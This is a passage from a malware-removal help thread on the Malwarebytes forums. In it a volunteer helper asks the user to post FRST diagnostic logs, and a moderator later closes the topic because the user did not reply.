  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;


This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Follow the instructions in the thread below, and provide me both FRST logs (FRST.txt and Addition.txt). You can attach them in your next post, or copy/paste their content.

https://forums.malwarebytes.com/topic/9573-im-infected-what-do-i-do-now/

Link to post
Share on other sites
Aura

Aura

Posted
Posted

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.

  I accept